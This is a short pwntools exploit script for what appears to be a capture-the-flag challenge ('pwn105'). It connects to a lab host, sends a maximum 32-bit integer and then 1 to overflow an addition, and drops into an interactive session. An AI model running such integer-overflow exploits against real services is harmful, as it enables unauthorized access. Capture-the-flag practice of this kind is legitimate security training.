#!/usr/bin/python3

from pwn import *

context.binary = target = ELF("./pwn105", checksec=False)
# r = process()
r = remote("10.10.167.194", 9004)

# funcs
s = lambda a: r.sendlineafter(b">> ", a)

# pop
s(b"2147483647")
s(b"1")

r.interactive()